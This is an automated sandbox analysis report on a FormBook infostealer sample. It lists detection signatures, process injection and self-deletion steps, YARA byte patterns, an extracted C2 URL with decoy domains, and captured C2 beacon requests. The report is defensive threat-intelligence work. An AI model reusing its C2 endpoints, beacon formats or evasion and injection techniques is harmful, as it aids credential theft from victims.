Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6KdTCZit4e.exe

Overview

General Information

Sample Name:6KdTCZit4e.exe
Analysis ID:452425
MD5:ed43ff447cd5486610731a627a930607
SHA1:91449c85fb2fa5d27f8db3c8c08cdfb9d3287162
SHA256:91cdb947644a5a802adac7583a79e7e560da38839489a02e7464730ff66fd004
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 6KdTCZit4e.exe (PID: 6568 cmdline: 'C:\Users\user\Desktop\6KdTCZit4e.exe' MD5: ED43FF447CD5486610731A627A930607)
    • 6KdTCZit4e.exe (PID: 6128 cmdline: C:\Users\user\Desktop\6KdTCZit4e.exe MD5: ED43FF447CD5486610731A627A930607)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 6708 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 4972 cmdline: /c del 'C:\Users\user\Desktop\6KdTCZit4e.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.6KdTCZit4e.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.6KdTCZit4e.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.6KdTCZit4e.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        7.2.6KdTCZit4e.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.6KdTCZit4e.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.hometowncashbuyersgroup.com/kkt/"], "decoy": ["inspirafutebol.com", "customgiftshouston.com", "mycreativelending.com", "psplaystore.com", "newlivingsolutionshop.com", "dechefamsterdam.com", "servicingl0ans.com", "atsdholdings.com", "manifestarz.com", "sequenceanalytica.com", "gethealthcaresmart.com", "theartofsurprises.com", "pirateequitypatrick.com", "alliance-ce.com", "wingrushusa.com", "funtimespheres.com", "solevux.com", "antimasathya.com", "profitexcavator.com", "lankeboxshop.com", "aarthiramamurthy.com", "oldmopaiv.xyz", "mavispaguzellik.com", "milkamax.com", "sputnikvasisi.com", "gametoyou.com", "sisconbol.com", "thedreamcertificate.com", "vichy-menuiserie.com", "pv-step.com", "growingmindstrilingual.com", "tlcrentny.com", "jedshomebuilders.com", "curtailit.com", "integruschamber.com", "lanzamientosbimbocolombia.com", "tightlinesfishingco.com", "doubleuphome.com", "arctic.solar", "unstopabbledomains.com", "aggiornamento-isp.info", "clarkandhurnlaw.com", "barefootbirthstl.com", "seanfeuct.com", "measureformeasurehome.com", "stephsavy.com", "loveflowersandevents.com", "czsis.com", "midnightblueinc.com", "today.dental", "customwithme.com", "edisetiyo.com", "jasoneganrealtor.com", "rihxertiza.com", "seahorseblast.net", "nedayerasa.com", "cliftonheightshoa.net", "theprofilemba.com", "cfwoods.com", "dogggo.com", "casatranquillainletbeach.com", "u1023.com", "aromakapseln.com", "zhwanjie.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 6KdTCZit4e.exeVirustotal: Detection: 38%Perma Link
          Source: 6KdTCZit4e.exeReversingLabs: Detection: 19%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
          Source: 7.2.6KdTCZit4e.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6KdTCZit4e.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6KdTCZit4e.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: 6KdTCZit4e.exe, 00000007.00000002.797353151.0000000001720000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.741672578.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: 6KdTCZit4e.exe, 00000007.00000002.797353151.0000000001720000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 6KdTCZit4e.exe, 00000007.00000002.795763283.000000000136F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000D.00000002.925610066.0000000002D00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 6KdTCZit4e.exe, 00000007.00000002.795763283.000000000136F000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.741672578.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.hometowncashbuyersgroup.com/kkt/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /kkt/?ibQh=6llLiJzHhP5P5Lj&I48l2h=L0B8w9HUZaOZ7jw4+npXJ0F94zqPsX3Vt6n0qHR8lA3J0yAUFnvUFF5QUXy5W701wjCn HTTP/1.1Host: www.thedreamcertificate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kkt/?I48l2h=JgCZg0ECNQCGdZh+l8D79i0V4/Xiha033Hwln1gAEXgZOLyx1jBrHFXC3spPC1oi0umv&ibQh=6llLiJzHhP5P5Lj HTTP/1.1Host: www.seahorseblast.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kkt/?ibQh=6llLiJzHhP5P5Lj&I48l2h=L0B8w9HUZaOZ7jw4+npXJ0F94zqPsX3Vt6n0qHR8lA3J0yAUFnvUFF5QUXy5W701wjCn HTTP/1.1Host: www.thedreamcertificate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /kkt/?I48l2h=JgCZg0ECNQCGdZh+l8D79i0V4/Xiha033Hwln1gAEXgZOLyx1jBrHFXC3spPC1oi0umv&ibQh=6llLiJzHhP5P5Lj HTTP/1.1Host: www.seahorseblast.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thedreamcertificate.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 08:35:02 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 202Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6b 6b 74 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /kkt/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000008.00000000.767736283.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 6KdTCZit4e.exeString found in binary or memory: http://www.xboxleaders.com/api/friends.json?gamertag=
          Source: 6KdTCZit4e.exeString found in binary or memory: http://www.xboxleaders.com/api/profile.json?gamertag=
          Source: explorer.exe, 00000008.00000000.750185799.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.6KdTCZit4e.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.6KdTCZit4e.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.924030938.00000000002A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.792849864.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.796818614.0000000001580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.924732457.0000000002890000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.796897067.00000000015B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\6KdTCZit4e.exeCode function: 7_2_00419E0A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 13_2_02D69520 NtWaitForSingleObject,
